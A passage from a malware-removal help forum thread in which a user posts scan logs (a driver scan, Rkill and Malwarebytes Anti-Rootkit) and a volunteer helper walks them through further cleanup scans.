17:32:34.0126 0x1b50 b06bdrv - ok

17:32:34.0186 0x1b50 [ B5ACE6968304A3900EEB1EBFD9622DF2, 1DAA118D8CA3F97B34DF3D3CDA1C78EAB2ED225699FEABE89D331AE0CB7679FA ] b57nd60a C:\Windows\system32\DRIVERS\b57nd60a.sys

17:32:34.0236 0x1b50 b57nd60a - ok

17:32:34.0266 0x1b50 [ FDE360167101B4E45A96F939F388AEB0, 8D1457E866BBD645C4B9710DFBFF93405CC1193BF9AE42326F2382500B713B82 ] BDESVC C:\Windows\System32\bdesvc.dll

17:32:34.0336 0x1b50 BDESVC - ok

17:32:34.0356 0x1b50 [ 16A47CE2DECC9B099349A5F840654746, 77C008AEDB07FAC66413841D65C952DDB56FE7DCA5E9EF9C8F4130336B838024 ] Beep C:\Windows\system32\drivers\Beep.sys

17:32:34.0416 0x1b50 Beep - ok

17:32:34.0506 0x1b50 [ 82974D6A2FD19445CC5171FC378668A4, 075D25F47C0D2277E40AF8615571DAA5EB16B1824563632A9A7EC62505C29A4A ] BFE C:\Windows\System32\bfe.dll

17:32:34.0596 0x1b50 BFE - ok

17:32:34.0656 0x1b50 [ 1EA7969E3271CBC59E1730697DC74682, D511A34D63A6E0E6E7D1879068E2CD3D87ABEAF4936B2EA8CDDAD9F79D60FA04 ] BITS C:\Windows\system32\qmgr.dll

17:32:34.0756 0x1b50 BITS - ok

17:32:34.0796 0x1b50 [ 61583EE3C3A17003C4ACD0475646B4D3, 17E4BECC309C450E7E44F59A9C0BBC24D21BDC66DFBA65B8F198A00BB47A9811 ] blbdrive C:\Windows\system32\DRIVERS\blbdrive.sys

17:32:34.0826 0x1b50 blbdrive - ok

17:32:34.0856 0x1b50 [ ABA3984C822E4D3F889699912D85D6C5, 2251FA135CC290DA13DAE4743F393C7CC9E6A737C054707CB8D72C369D1FFACB ] bowser C:\Windows\system32\DRIVERS\bowser.sys

17:32:35.0008 0x1b50 bowser - ok

17:32:35.0028 0x1b50 [ F09EEE9EDC320B5E1501F749FDE686C8, 66691114C42E12F4CC6DC4078D4D2FA4029759ACDAF1B59D17383487180E84E3 ] BrFiltLo C:\Windows\system32\DRIVERS\BrFiltLo.sys

17:32:35.0068 0x1b50 BrFiltLo - ok

17:32:35.0088 0x1b50 [ B114D3098E9BDB8BEA8B053685831BE6, 0ED23C1897F35FA00B9C2848DE4ED200E18688AA7825674888054BBC3A3EB92C ] BrFiltUp C:\Windows\system32\DRIVERS\BrFiltUp.sys

17:32:35.0128 0x1b50 BrFiltUp - ok

17:32:35.0168 0x1b50 [ 5C2F352A4E961D72518261257AAE204B, 9EE1001E1D46A414A7A86FE1DBBE232203E26F54D9EF43ED31ED8EACD4D09853 ] BridgeMP C:\Windows\system32\DRIVERS\bridge.sys

17:32:35.0218 0x1b50 BridgeMP - ok

17:32:35.0278 0x1b50 [ 05F5A0D14A2EE1D8255C2AA0E9E8E694, 40011138869F5496A3E78D38C9900B466B6F3877526AC22952DCD528173F4645 ] Browser C:\Windows\System32\browser.dll

17:32:35.0358 0x1b50 Browser - ok

17:32:35.0388 0x1b50 [ 43BEA8D483BF1870F018E2D02E06A5BD, 4E6F5A5FD8C796A110B0DC9FF29E31EA78C04518FC1C840EF61BABD58AB10272 ] Brserid C:\Windows\System32\Drivers\Brserid.sys

17:32:35.0438 0x1b50 Brserid - ok

17:32:35.0448 0x1b50 [ A6ECA2151B08A09CACECA35C07F05B42, E2875BB7768ABAF38C3377007AA0A3C281503474D1831E396FB6599721586B0C ] BrSerWdm C:\Windows\System32\Drivers\BrSerWdm.sys

17:32:35.0478 0x1b50 BrSerWdm - ok

17:32:35.0498 0x1b50 [ B79968002C277E869CF38BD22CD61524, 50631836502237AF4893ECDCEA43B9031C3DE97433F594D46AF7C3C77F331983 ] BrUsbMdm C:\Windows\System32\Drivers\BrUsbMdm.sys

17:32:35.0518 0x1b50 BrUsbMdm - ok

17:32:35.0528 0x1b50 [ A87528880231C54E75EA7A44943B38BF, 4C8BBB29FDA76A96840AA47A8613C15D4466F9273A13941C19507008629709C9 ] BrUsbSer C:\Windows\System32\Drivers\BrUsbSer.sys

17:32:35.0568 0x1b50 BrUsbSer - ok

17:32:35.0618 0x1b50 [ CF98190A94F62E405C8CB255018B2315, E1B2540023C4FE9FD588E4B6AE6347DFA565EB3898F21E5360882BF3E8B5E781 ] BthEnum C:\Windows\system32\drivers\BthEnum.sys

17:32:35.0708 0x1b50 BthEnum - ok

17:32:35.0738 0x1b50 [ 9DA669F11D1F894AB4EB69BF546A42E8, B498B8B6CEF957B73179D1ADAF084BBB57BB3735D810F9BE2C7B1D58A4FD25A4 ] BTHMODEM C:\Windows\system32\DRIVERS\bthmodem.sys

17:32:35.0758 0x1b50 BTHMODEM - ok

17:32:35.0788 0x1b50 [ 02DD601B708DD0667E1331FA8518E9FF, 7DE6CC4DBB621CD03B01D9CE6CF66EAFE31D39030A391562CD0E278E1D70ADE1 ] BthPan C:\Windows\system32\DRIVERS\bthpan.sys

17:32:35.0858 0x1b50 BthPan - ok

17:32:35.0898 0x1b50 [ 738D0E9272F59EB7A1449C3EC118E6C4, FE3D32C2A5E4DC21376A0F89C0B2EE024ECF1A3FB99213CC9BBC986ADF7AF080 ] BTHPORT C:\Windows\System32\Drivers\BTHport.sys

17:32:35.0948 0x1b50 BTHPORT - ok

17:32:35.0968 0x1b50 [ 95F9C2976059462CBBF227F7AAB10DE9, 2797AE919FF7606B070FB039CECDB0707CD2131DCAC09C5DF14F443D881C9F34 ] bthserv C:\Windows\system32\bthserv.dll

17:32:36.0008 0x1b50 bthserv - ok

17:32:36.0038 0x1b50 [ F188B7394D81010767B6DF3178519A37, 576304E92FD94908F093A6AB5F4D328F25829BE32EC3CA0D29EBFDF5DE83539B ] BTHUSB C:\Windows\System32\Drivers\BTHUSB.sys

17:32:36.0068 0x1b50 BTHUSB - ok

17:32:36.0098 0x1b50 [ 6BCFDC2B5B7F66D484486D4BD4B39A6B, 2A2039DD524E989EA91B7C91D5F295C663D1E27ABD64777D2F3137EB1C42C258 ] btwaudio C:\Windows\system32\drivers\btwaudio.sys

17:32:36.0108 0x1b50 btwaudio - ok

17:32:36.0128 0x1b50 [ 82DC8B7C626E526681C1BEBED2BC3FF9, 58260E88CDD7388ABA563F9B8F2F3FA17022DB9E4C56EBA0761E99B919A8EAF8 ] btwavdt C:\Windows\system32\DRIVERS\btwavdt.sys

17:32:36.0138 0x1b50 btwavdt - ok

17:32:36.0208 0x1b50 [ 17DA11C703B8E86AC3DF8F796A118AEF, 2E81930590742F876F8147B2CBC32AE9A6883B7E924EF20278243A8AC53F5BA4 ] btwdins C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe

17:32:36.0248 0x1b50 btwdins - ok

17:32:36.0268 0x1b50 [ 6149301DC3F81D6F9667A3FBAC410975, 120E201AFB07054C7F6321461D194843C695012431DBD791E36BBF73FDD41E8A ] btwl2cap C:\Windows\system32\DRIVERS\btwl2cap.sys

17:32:36.0278 0x1b50 btwl2cap - ok

17:32:36.0288 0x1b50 [ 28E105AD3B79F440BF94780F507BF66A, EF4E6CCAB16765E2C88666625C13CB3299B668159A94CB201E3B44701A30640A ] btwrchid C:\Windows\system32\DRIVERS\btwrchid.sys

17:32:36.0298 0x1b50 btwrchid - ok

17:32:36.0328 0x1b50 [ B8BD2BB284668C84865658C77574381A, 6C55BA288B626DF172FDFEA0BD7027FAEBA1F44EF20AB55160D7C7DC6E717D65 ] cdfs C:\Windows\system32\DRIVERS\cdfs.sys

17:32:36.0378 0x1b50 cdfs - ok

17:32:36.0428 0x1b50 [ F036CE71586E93D94DAB220D7BDF4416, BD07AAD9E20CEAF9FC84E4977C55EA2C45604A2C682AC70B9B9A2199B6713D5B ] cdrom C:\Windows\system32\DRIVERS\cdrom.sys

17:32:36.0468 0x1b50 cdrom - ok

17:32:36.0528 0x1b50 [ F17D1D393BBC69C5322FBFAFACA28C7F, 62A1A92B3C52ADFD0B808D7F69DD50238B5F202421F1786F7EAEAA63F274B3E8 ] CertPropSvc C:\Windows\System32\certprop.dll

17:32:36.0608 0x1b50 CertPropSvc - ok

17:32:36.0638 0x1b50 [ D7CD5C4E1B71FA62050515314CFB52CF, 513B5A849899F379F0BC6AB3A8A05C3493C2393C95F036612B96EC6E252E1C64 ] circlass C:\Windows\system32\DRIVERS\circlass.sys

17:32:36.0678 0x1b50 circlass - ok

17:32:36.0718 0x1b50 [ 3D67C27DD17B254D7915FA16A5AE3573, 5B3A6C6A7F940C06362775DAF13CEADA37C7AA84A509458A57C23B4369970A90 ] CLFS C:\Windows\system32\CLFS.sys

17:32:36.0748 0x1b50 CLFS - ok

17:32:37.0178 0x1b50 [ F7BCDE28B6F0A57AD443DF3AA26F0052, A2AD94A8B89B22C5AD4B6926617338E867392A27F166CB70591788EC8651387F ] ClickToRunSvc C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

17:32:37.0329 0x1b50 ClickToRunSvc - ok

17:32:37.0402 0x1b50 [ F13EC8A783E0CB0D6DC26A3CA848B7B8, 0809E3B71709F1343086EEB6C820543C1A7119E74EEF8AC1AEE1F81093ABEC66 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe

17:32:37.0422 0x1b50 clr_optimization_v2.0.50727_32 - ok

17:32:37.0482 0x1b50 [ B4D73F04E9BC076F7CDAC4327DF636BB, 1ADED20D5A0D0A76E2F85CB778FD06BAB814868D35F8532E17D67045FF4770C2 ] clr_optimization_v2.0.50727_64 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe

17:32:37.0502 0x1b50 clr_optimization_v2.0.50727_64 - ok

17:32:37.0592 0x1b50 [ 5BAF4F1296D4D91FC28560CDB4C37C4B, ACA4BC57ED1F8432F18F0F215EC7FF956BAEF6E02760779E264E4008A979E9DD ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe

17:32:37.0642 0x1b50 clr_optimization_v4.0.30319_32 - ok

17:32:37.0662 0x1b50 [ 569B54004A7E85A74FD92841DE6058E2, 58949313D0F6B1C06359B2F3C68E29940B1655A17E93FFC3718F6D2EAE1633E4 ] clr_optimization_v4.0.30319_64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

17:32:37.0742 0x1b50 clr_optimization_v4.0.30319_64 - ok

17:32:37.0782 0x1b50 [ 0840155D0BDDF1190F84A663C284BD33, 696039FA63CFEB33487FAA8FD7BBDB220141E9C6E529355D768DFC87999A9C3A ] CmBatt C:\Windows\system32\DRIVERS\CmBatt.sys

17:32:37.0802 0x1b50 CmBatt - ok

17:32:37.0832 0x1b50 [ E19D3F095812725D88F9001985B94EDD, 46243C5CCC4981CAC6FA6452FFCEC33329BF172448F1852D52592C9342E0E18B ] cmdide C:\Windows\system32\drivers\cmdide.sys

17:32:37.0852 0x1b50 cmdide - ok

17:32:37.0892 0x1b50 [ A98CED39AD91B445E2E442A9BD67E8B4, B4189DEEF1C0EE22AE983119047B1A40FFDD8F3E163DFFABD7C2706231B0B1B0 ] CNG C:\Windows\system32\Drivers\cng.sys

17:32:37.0962 0x1b50 CNG - ok

17:32:38.0052 0x1b50 [ F9A79C5B27037821112C50A9C8FB367A, D9990AE1A0CA767E54C9D3FD2C6EA2A068DFD5A270102E915F71648A0C59097B ] Com4QLBEx C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe

17:32:38.0082 0x1b50 Com4QLBEx - ok

17:32:38.0102 0x1b50 [ 102DE219C3F61415F964C88E9085AD14, CD74CB703381F1382C32CF892FF2F908F4C9412E1BC77234F8FEA5D4666E1BF1 ] Compbatt C:\Windows\system32\DRIVERS\compbatt.sys

17:32:38.0112 0x1b50 Compbatt - ok

17:32:38.0162 0x1b50 [ 03EDB043586CCEBA243D689BDDA370A8, 0E4523AA332E242D5C2C61C5717DBA5AB6E42DADB5A7E512505FC2B6CC224959 ] CompositeBus C:\Windows\system32\drivers\CompositeBus.sys

17:32:38.0202 0x1b50 CompositeBus - ok

17:32:38.0232 0x1b50 COMSysApp - ok

17:32:38.0252 0x1b50 [ 1C827878A998C18847245FE1F34EE597, 41EF7443D8B2733AA35CAC64B4F5F74FAC8BB0DA7D3936B69EC38E2DC3972E60 ] crcdisk C:\Windows\system32\DRIVERS\crcdisk.sys

17:32:38.0262 0x1b50 crcdisk - ok

17:32:38.0302 0x1b50 [ 2C6632CECFDBBE793FDA8AF9CA55A9CC, 335188515F798483660E529204A13012E4D21B0ECA489224A11C26F91A5B3CCE ] CryptSvc C:\Windows\system32\cryptsvc.dll

17:32:38.0342 0x1b50 CryptSvc - ok

17:32:38.0402 0x1b50 [ DC08465037FA57A5203BDF3E963422C2, ADA7F6B4ED68413924E187DA1A609BB7B7AA5E483055994A17AEBC7F1BCEC5F2 ] ctxusbm C:\Windows\system32\DRIVERS\ctxusbm.sys

17:32:38.0422 0x1b50 ctxusbm - ok

17:32:38.0482 0x1b50 [ 622C96AFB07BB82C8650B47172137AC4, B74CEA5A3F4945E5A3EAE7AF1B1FA75F611C65C6FACE393052A512FA81B0C17C ] DcomLaunch C:\Windows\system32\rpcss.dll

17:32:38.0582 0x1b50 DcomLaunch - ok

17:32:38.0622 0x1b50 [ 3CEC7631A84943677AA8FA8EE5B6B43D, 32061DAC9ED6C1EBA3B367B18D0E965AEEC2DF635DCF794EC39D086D32503AC5 ] defragsvc C:\Windows\System32\defragsvc.dll

17:32:38.0672 0x1b50 defragsvc - ok

17:32:38.0722 0x1b50 [ 9B38580063D281A99E68EF5813022A5F, D91676B0E0A8E2A090E3E5DD340ABCFC20AE0F55B4C82869D6CFB34239BD27DA ] DfsC C:\Windows\system32\Drivers\dfsc.sys

17:32:38.0752 0x1b50 DfsC - ok

17:32:38.0862 0x1b50 [ 0F4A5D01156B948B54550375498B08A2, 1CAE3D744429A06E9C9EC46AC6B216AB68154EF8FACDD0721C47902B83820F56 ] dg_ssudbus C:\Windows\system32\DRIVERS\ssudbus.sys

17:32:38.0902 0x1b50 dg_ssudbus - ok

17:32:38.0952 0x1b50 [ 43D808F5D9E1A18E5EEB5EBC83969E4E, C10D1155D71EABE4ED44C656A8F13078A8A4E850C4A8FBB92D52D173430972B8 ] Dhcp C:\Windows\system32\dhcpcore.dll

17:32:39.0042 0x1b50 Dhcp - ok

17:32:39.0152 0x1b50 [ EE9954237F15BE4DD9304D12E4D305ED, F295C9BAF20F0E669B673AFCC16B4969EE31B6A3808980DAB93D9B0F167DA3C0 ] DiagTrack C:\Windows\system32\diagtrack.dll

17:32:39.0322 0x1b50 DiagTrack - ok

17:32:39.0372 0x1b50 [ 13096B05847EC78F0977F2C0F79E9AB3, 1E44981B684F3E56F5D2439BB7FA78BD1BC876BB2265AE089AEC68F241B05B26 ] discache C:\Windows\system32\drivers\discache.sys

17:32:39.0412 0x1b50 discache - ok

17:32:39.0462 0x1b50 [ 616387BBD83372220B09DE95F4E67BBC, 5E2D5280BB775576E7CDE3FA6BDE494E183123635E5908CF7EBF1FF52966D07D ] Disk C:\Windows\system32\drivers\disk.sys

17:32:39.0492 0x1b50 Disk - ok

17:32:39.0532 0x1b50 [ 16835866AAA693C7D7FCEBA8FFF706E4, 15891558F7C1F2BB57A98769601D447ED0D952354A8BB347312D034DC03E0242 ] Dnscache C:\Windows\System32\dnsrslvr.dll

17:32:39.0612 0x1b50 Dnscache - ok

17:32:39.0672 0x1b50 [ B1FB3DDCA0FDF408750D5843591AFBC6, AB6AD9C5E7BA2E3646D0115B67C4800D1CB43B4B12716397657C7ADEEE807304 ] dot3svc C:\Windows\System32\dot3svc.dll

17:32:39.0732 0x1b50 dot3svc - ok

17:32:39.0802 0x1b50 [ B42ED0320C6E41102FDE0005154849BB, 4DB872E23AD049C3C9FDC0759FC58BFA60DA91B18BC82B611BFA300D26DDFC7A ] Dot4 C:\Windows\system32\DRIVERS\Dot4.sys

17:32:39.0852 0x1b50 Dot4 - ok

17:32:39.0922 0x1b50 [ E9F5969233C5D89F3C35E3A66A52A361, C4BD35795C78FB11E6022372CB25DEB570730EFDAD3DC1584368235FF622638C ] Dot4Print C:\Windows\system32\drivers\Dot4Prt.sys

17:32:39.0972 0x1b50 Dot4Print - ok

17:32:40.0002 0x1b50 [ FD05A02B0370BC3000F402E543CA5814, 089B1113E640F495F470E8F57060B89546270481B309DC8ED3C3D13A849076A3 ] dot4usb C:\Windows\system32\DRIVERS\dot4usb.sys

17:32:40.0032 0x1b50 dot4usb - ok

17:32:40.0082 0x1b50 [ B26F4F737E8F9DF4F31AF6CF31D05820, 394BBBED4EC7FAD4110F62A43BFE0801D4AC56FFAC6C741C69407B26402311C7 ] DPS C:\Windows\system32\dps.dll

17:32:40.0142 0x1b50 DPS - ok

17:32:40.0192 0x1b50 [ 26FE888505E5A945B0536AF9A2A27A6F, A6B16ED498BAFE300E1F0E0A241E3D62F7A1C5973EE775904ED14F33A2BC08A6 ] drmkaud C:\Windows\system32\drivers\drmkaud.sys

17:32:40.0292 0x1b50 drmkaud - ok

17:32:40.0362 0x1b50 [ 3A9D7D464BDB3B70D7ECF689ADABBD4D, B4F5B23705EA1BA453FE30791CA245E1A5F7FBEABAD026E4A8A15A9FC44E8C9C ] DXGKrnl C:\Windows\System32\drivers\dxgkrnl.sys

17:32:40.0422 0x1b50 DXGKrnl - ok

17:32:40.0462 0x1b50 [ E2DDA8726DA9CB5B2C4000C9018A9633, 0C967DBC3636A76A696997192A158AA92A1AF19F01E3C66D5BF91818A8FAEA76 ] EapHost C:\Windows\System32\eapsvc.dll

17:32:40.0502 0x1b50 EapHost - ok

17:32:40.0622 0x1b50 [ DC5D737F51BE844D8C82C695EB17372F, 6D4022D9A46EDE89CEF0FAEADCC94C903234DFC460C0180D24FF9E38E8853017 ] ebdrv C:\Windows\system32\DRIVERS\evbda.sys

17:32:40.0772 0x1b50 ebdrv - ok

17:32:40.0812 0x1b50 [ CA69E856332E2D85294665F6B7E97254, A9693F836907FB0154DC1090D9476F1E9242ABE922D932D74D0385772D2EAB65 ] EFS C:\Windows\System32\lsass.exe

17:32:40.0902 0x1b50 EFS - ok

17:32:40.0992 0x1b50 [ C4002B6B41975F057D98C439030CEA07, 3D2484FBB832EFB90504DD406ED1CF3065139B1FE1646471811F3A5679EF75F1 ] ehRecvr C:\Windows\ehome\ehRecvr.exe

17:32:41.0062 0x1b50 ehRecvr - ok

17:32:41.0092 0x1b50 [ 4705E8EF9934482C5BB488CE28AFC681, 359E9EC5693CE0BE89082E1D5D8F5C5439A5B985010FF0CB45C11E3CFE30637D ] ehSched C:\Windows\ehome\ehsched.exe

17:32:41.0152 0x1b50 ehSched - ok

17:32:41.0192 0x1b50 [ 0E5DA5369A0FCAEA12456DD852545184, 9A64AC5396F978C3B92794EDCE84DCA938E4662868250F8C18FA7C2C172233F8 ] elxstor C:\Windows\system32\DRIVERS\elxstor.sys

17:32:41.0222 0x1b50 elxstor - ok

17:32:41.0252 0x1b50 [ 524C79054636D2E5751169005006460B, 1EBA5972E13C5BB07BBD94D6647B86469B4910F60A3C8BDDC6BB5736EF99C9C3 ] enecir C:\Windows\system32\DRIVERS\enecir.sys

17:32:41.0302 0x1b50 enecir - ok

17:32:41.0392 0x1b50 [ 883C49EABBA05A527DE97354B1A7AC82, 6A87883D90BEC956BF4DE1FB40AC516D1946691F5AD66BC35AA28E8F655B1BDD ] EpsonCustomerResearchParticipation C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe

17:32:41.0432 0x1b50 EpsonCustomerResearchParticipation - ok

17:32:41.0492 0x1b50 [ D315FF43E23DF424ECEC2F6C930203E4, 68940EDA34DC4945CDD0D8018D96A0DA8F99F16A930946D14E4FECEE033FCB80 ] EpsonScanSvc C:\Windows\system32\EscSvc64.exe

17:32:41.0512 0x1b50 EpsonScanSvc - ok

17:32:41.0572 0x1b50 [ 86032A47AD0105130FE7808C903E2086, ACCCA35483B7E8F9FC72A65031E024C469DF94FCCF2C5CC37C9B3BED4F1C676E ] EPSON_PM_RPCV4_06 C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE

17:32:41.0592 0x1b50 EPSON_PM_RPCV4_06 - ok

17:32:41.0632 0x1b50 [ 34A3C54752046E79A126E15C51DB409B, 7D5B5E150C7C73666F99CBAFF759029716C86F16B927E0078D77F8A696616D75 ] ErrDev C:\Windows\system32\drivers\errdev.sys

17:32:41.0672 0x1b50 ErrDev - ok

17:32:41.0732 0x1b50 [ 4166F82BE4D24938977DD1746BE9B8A0, 24121751B7306225AD1C808442D7B030DEF377E9316AA0A3C5C7460E87317881 ] EventSystem C:\Windows\system32\es.dll

17:32:41.0802 0x1b50 EventSystem - ok

17:32:41.0832 0x1b50 [ A510C654EC00C1E9BDD91EEB3A59823B, 76CD277730F7B08D375770CD373D786160F34D1481AF0536BA1A5D2727E255F5 ] exfat C:\Windows\system32\drivers\exfat.sys

17:32:41.0892 0x1b50 exfat - ok

17:32:41.0922 0x1b50 [ 0ADC83218B66A6DB380C330836F3E36D, 798D6F83B5DBCC1656595E0A96CF12087FCCBE19D1982890D0CE5F629B328B29 ] fastfat C:\Windows\system32\drivers\fastfat.sys

17:32:41.0962 0x1b50 fastfat - ok

17:32:42.0042 0x1b50 [ DBEFD454F8318A0EF691FDD2EAAB44EB, 7F52AE222FF28503B6FC4A5852BD0CAEAF187BE69AF4B577D3DE474C24366099 ] Fax C:\Windows\system32\fxssvc.exe

17:32:42.0082 0x1b50 Fax - ok

17:32:42.0102 0x1b50 [ D765D19CD8EF61F650C384F62FAC00AB, 9F0A483A043D3BA873232AD3BA5F7BF9173832550A27AF3E8BD433905BD2A0EE ] fdc C:\Windows\system32\DRIVERS\fdc.sys

17:32:42.0122 0x1b50 fdc - ok

17:32:42.0152 0x1b50 [ 0438CAB2E03F4FB61455A7956026FE86, 6D4DDC2973DB25CE0C7646BC85EFBCC004EBE35EA683F62162AE317C6F1D8DFE ] fdPHost C:\Windows\system32\fdPHost.dll

17:32:42.0202 0x1b50 fdPHost - ok

17:32:42.0222 0x1b50 [ 802496CB59A30349F9A6DD22D6947644, 52D59D3D628D5661F83F090F33F744F6916E0CC1F76E5A33983E06EB66AE19F8 ] FDResPub C:\Windows\system32\fdrespub.dll

17:32:42.0282 0x1b50 FDResPub - ok

17:32:42.0312 0x1b50 [ 655661BE46B5F5F3FD454E2C3095B930, 549C8E2A2A37757E560D55FFA6BFDD838205F17E40561E67F0124C934272CD1A ] FileInfo C:\Windows\system32\drivers\fileinfo.sys

17:32:42.0322 0x1b50 FileInfo - ok

17:32:42.0332 0x1b50 [ 5F671AB5BC87EEA04EC38A6CD5962A47, 6B61D3363FF3F9C439BD51102C284972EAE96ACC0683B9DC7E12D25D0ADC51B6 ] Filetrace C:\Windows\system32\drivers\filetrace.sys

17:32:42.0382 0x1b50 Filetrace - ok

17:32:42.0402 0x1b50 [ C172A0F53008EAEB8EA33FE10E177AF5, 9175A95B323696D1B35C9EFEB7790DD64E6EE0B7021E6C18E2F81009B169D77B ] flpydisk C:\Windows\system32\DRIVERS\flpydisk.sys

17:32:42.0422 0x1b50 flpydisk - ok

17:32:42.0442 0x1b50 [ DA6B67270FD9DB3697B20FCE94950741, F621A4462C9F2904063578C427FAF22D7D66AE9967605C11C798099817CE5331 ] FltMgr C:\Windows\system32\drivers\fltmgr.sys

17:32:42.0482 0x1b50 FltMgr - ok

17:32:42.0582 0x1b50 [ CF0108CBA6D1860563BA20E3D74C6646, 737B5E89A858D7E3AEC8BF660AA4FCC56501A69468EA143531286016AF7C0B33 ] FontCache C:\Windows\system32\FntCache.dll

17:32:42.0712 0x1b50 FontCache - ok

17:32:42.0772 0x1b50 [ A8B7F3818AB65695E3A0BB3279F6DCE6, 89FCF10F599767E67A1E011753E34DA44EAA311F105DBF69549009ED932A60F0 ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe

17:32:42.0792 0x1b50 FontCache3.0.0.0 - ok

17:32:42.0822 0x1b50 [ D43703496149971890703B4B1B723EAC, F06397B2EDCA61629249D2EF1CBB7827A8BEAB8488246BD85EF6AE1363C0DA6E ] FsDepends C:\Windows\system32\drivers\FsDepends.sys

17:32:42.0852 0x1b50 FsDepends - ok

17:32:42.0882 0x1b50 [ 6BD9295CC032DD3077C671FCCF579A7B, 83622FBB0CB923798E7E584BF53CAAF75B8C016E3FF7F0FA35880FF34D1DFE33 ] Fs_Rec C:\Windows\system32\drivers\Fs_Rec.sys

17:32:42.0892 0x1b50 Fs_Rec - ok

17:32:42.0952 0x1b50 [ 8F6322049018354F45F05A2FD2D4E5E0, 73BF0FB4EBD7887E992DDEBB79E906958D6678F8D1107E8C368F5A0514D80359 ] fvevol C:\Windows\system32\DRIVERS\fvevol.sys

17:32:42.0982 0x1b50 fvevol - ok

17:32:43.0002 0x1b50 [ 8C778D335C9D272CFD3298AB02ABE3B6, 85F0B13926B0F693FA9E70AA58DE47100E4B6F893772EBE4300C37D9A36E6005 ] gagp30kx C:\Windows\system32\DRIVERS\gagp30kx.sys

17:32:43.0022 0x1b50 gagp30kx - ok



#18 krtate (Advanced Member, 170 posts)

Posted 10 April 2017 - 06:24 PM

 

Rkill 2.8.4 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2017 BleepingComputer.com
More Information about Rkill can be found at this link:
 http://www.bleepingc...opic308364.html

Program started at: 04/10/2017 07:20:09 PM in x64 mode.
Windows Version: Windows 7 Home Premium Service Pack 1

Checking for Windows services to stop:

 * No malware services found to stop.

Checking for processes to terminate:

 * C:\Users\KEKLR\AppData\Local\Temp\{DB8B76BB-4FEE-434E-A19F-7C63CEB3B069}\{0C5C0D1B-D4FD-468F-A887-049510D06E0E}.exe (PID: 7320) [T-HEUR]

1 proccess terminated!

Checking Registry for malware related settings:

 * No issues found in the Registry.

Resetting .EXE, .COM, & .BAT associations in the Windows Registry.

Performing miscellaneous checks:

 * No issues found.

Checking Windows Service Integrity:

 * TBS [Missing Service]

Searching for Missing Digital Signatures:

 * No issues found.

Checking HOSTS File:

 * HOSTS file entries found:

  127.0.0.1       localhost

Program finished at: 04/10/2017 07:22:50 PM
Execution time: 0 hours(s), 2 minute(s), and 40 seconds(s)



#19 krtate (Advanced Member, 170 posts)

Posted 10 April 2017 - 07:02 PM

I tried running RogueKiller and once again it ran for about 16 minutes and then closed. Up to that point it had found 24 things.

I opened IE so I could reply and I got the message again about trying to change the home page to "h ttp:/go.microsoft.com/fwlink/?LinkID=61....."

 

I took a screenshot of the option; it asked change or don't change. I changed the link above so it couldn't be clicked on. The link above is just a portion of the entire link.


Edited by krtate, 10 April 2017 - 07:26 PM.


#20 krtate

    Advanced Member

  • Full Member
  • 170 posts

Posted 10 April 2017 - 08:02 PM

I tried running the program again; my Microsoft Security Essentials appears to be stopping the run. It finds Behavior.Win32/Powessere.D.

Should I be turning off Security Essentials?



#21 Android 8888

    SWI Malware Tracker

  • Helper
  • 865 posts

Posted 11 April 2017 - 05:40 AM

Hello krtate.

Leave Microsoft Security Essentials for now.


Please re-run Malwarebytes Anti-Rootkit BETA as follows:

  • Within the mbar folder right-click the mbar.exe file and select Run as administrator;
  • Accept the User Account Control warning prompt to start the tool;
  • Update its database and then ensure the check-boxes under "Scan targets" are all ticked and click the Scan button;
  • If infections are found click the Cleanup button to remove the threats;
  • Reboot the computer if prompted. Wait while the system shuts down and the cleanup process is performed;
  • After restarting the computer, perform another scan with Malwarebytes Anti-Rootkit to verify that no threats remain. If they do, then click the Cleanup button once more to repeat the process;
  • If no threats were found, click the Exit button.

Please copy and paste the contents of the new mbar-log-TODAY'S-DATE.


Next,

Run FRST one more time, ensure all check-boxes are ticked under "Whitelist" but only Addition.txt under "Optional scan".
Then click the Scan button and wait until the scan is completed.
After it has finished, please copy and paste the contents of the new logs (FRST.txt and Addition.txt) in your reply for my review.


Thank you.

Android 8888

Android 8888

Website: http://android8888.comlu.com

Tavira - Here's where I live!

Please read the Instructions for posting requested logs and the article "So how did I get infected in the first place?"

Our help is free, but if you wish to help keep these forums running please consider a donation; Please see This Topic for details.


#22 krtate

    Advanced Member

  • Full Member
  • 170 posts

Posted 11 April 2017 - 05:56 AM

Will post scan early evening.



#23 Android 8888

    SWI Malware Tracker

  • Helper
  • 865 posts

Posted 11 April 2017 - 06:01 AM

Okay, I'll wait.

Thank you.

Android 8888




#24 krtate

    Advanced Member

  • Full Member
  • 170 posts

Posted 11 April 2017 - 04:35 PM

Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2017.04.11.04
  rootkit: v2017.04.02.01

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 11.0.9600.18617
KEKLR :: KEKLR-PC [administrator]

4/11/2017 6:46:51 AM
mbar-log-2017-04-11 (06-46-51).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 313067
Time elapsed: 39 minute(s), 55 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 0
(No malicious items detected)

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)



#25 krtate

    Advanced Member

  • Full Member
  • 170 posts

Posted 11 April 2017 - 04:46 PM

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 15-03-2017
